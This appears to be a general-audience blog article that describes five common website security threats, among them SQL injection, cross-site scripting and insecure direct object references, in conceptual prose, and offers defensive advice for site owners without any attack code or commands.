Much as we would like to think otherwise, our online identities are just one little hack away from falling into unscrupulous hands. Websites that we trust our most personal information to – our birthdates, our permanent addresses, our credit card information, even our social security numbers – are not as bullet proof as we’d like them to be.
No ad to show here.
2013 saw a trend of increasingly sophisticated security breaches that took so many different shapes that it was difficult to keep track of them all. From malware that stealthily installed itself on your machine to DDOS attacks that took network systems unawares to phishing attacks that grew alarmingly more believable, we lived through a year of many firsts.
If being an internet user has become constantly threatened by one online crisis after another, being a website owner is now doubly dangerous. Not only are you in danger of losing your own data, but are liable for the misdeeds that people do with your customers’ data as well. Reminds me of Target’s security breach late in 2013 – that lost information for over 40 million debit and credit card holders, leading to millions of dollars in losses during the holiday season in 2013.
While almost no type of website is safe from attacks by cyber criminals, there are some industries that are more vulnerable than most.
Let’s take a closer look at the top 5 security threats that an average website is vulnerable to, according to the Open Source Web Application Consortium’s report for 2013.
This is one of the oldest forms of security breaches out there. The fundamental idea behind an SQL Injection attack is to access and retrieve critical information from a website’s database. SQL Injection does this by exploiting an existing vulnerability in a site’s code, inserting malicious SQL code into it, and running this ill-intentioned code to retrieve the desired data from the system.
This is usually carried out by attacking vulnerable locations like form fields, where a user’s inputs are incorrectly filtered for special characters and unexpectedly executed by the website’s interpreter.
Broken authentication and session management
This is a form of attack on the database of a website to gain access to user information. To this end, hackers try to gain entry into the system via leaks in the session management and authentication system.
Session management and user authentication refers to managing live sessions on a website, typically using a username and password combination. While there are other ways to authenticate users when they log in, the costs of these technologies are usually too prohibitive to justify the expense in most cases.
There can be various vulnerable areas in a session, including unprotected or unencrypted user passwords stored in the database, weak password management processes, no automated session timeouts, session IDs exposed in a URL, sessions that aren’t invalidated during logouts, etc. Attackers use gaps in a website’s session management system to impersonate users, and access the identity and data associated with their accounts.
Cross site scripting
Cross Site Scripting is a form of attack that rides on the weaknesses in a user’s browser and injects malicious HTML or scripts into otherwise harmless web pages meant for user viewing. This attack depends on the victim clicking on a seemingly innocuous (but extremely malicious) URL in their browser, and inadvertently executing a malevolent script, downloading malware into their machines, resulting in unpleasant consequences overall.
Cross Site Scripting is usually employed by attackers alongside data theft methods like phishing and social engineering. Via cross site scripting, attackers gain access to sensitive user information like financial and personal data through cookies and session IDs.
It can be quite tough to identify and root out Cross Site Scripting from an affected website, as this form of attack can be carried out in a wide variety of ways. You need to carry out a regular security review of your site’s code, and implement web application firewalls such as this one from Incapsula to nip such attacks at the bud.
Insecure direct object reference
When a website exposes the actual name of internal implementation object like directories, database records or account data to an external user, it opens itself up to the possibility of an Insecure Direct Object Reference by an attacker.
This disclosure happens when such objects are ‘referenced’ in a URL that is open for all to see. All that an attacker has to do in this case is to modify the name of the referenced object in the URL to gain access to unauthorized data and wreak havoc on the website’s security.
This is an extremely easy to execute attack that can be thwarted by avoiding the temptation to directly reference key objects in URLs that are open to all. If you do have to expose references to direct objects in your URLs, build in a layer of authentication to secure your data. Make a user sign in and verify if he/she is authorized to view the sensitive data accessed via such URLs on your website.
An average website today is not a single layer of code that runs on your chosen servers. It typically consists of a huge number of layers like your web platform, server, database, framework, APIs, plugins, custom code, and so on. To ensure a secure website, each layer needs to be secured separately.
Most plug and play websites have built in security mechanisms for every layer of the site. Security misconfiguration refers to errors in configuring access and authentication for the different layers of your website. This includes things like setting up and changing passwords, setting up firewall rules and exceptions, downloading and running the latest security patches for your software, etc.
In the event of a security misconfiguration, attackers sneak into your website by accessing default accounts, unused pages, unpatched software vulnerabilities or unprotected sections of your site.
These easy-to-exploit security holes is also quite easy to detect and patch. All it takes is persistence and thoroughness while setting up your website and its accessibility parameters. Delete apps and plugins that you do not use. Delete defunct accounts to prevent them from being hijacked by attackers. Always keep your software up to date with the latest patches. Use automated scanners as a form of preventive maintenance to detect missing site patches, default accounts or other security misconfigurations.
While there are multiple ways attackers can gain entry into your site and misuse your data, there are equally manifold ways for you to stay protected from such attacks. All it takes to stay on top of security threats is strong coding to begin with, proactive vigilance to detect issues before they blow up in your face, and quick action to fix problems that show signs of aggravating into major security breaches
Image: Rajesh_India via Flickr.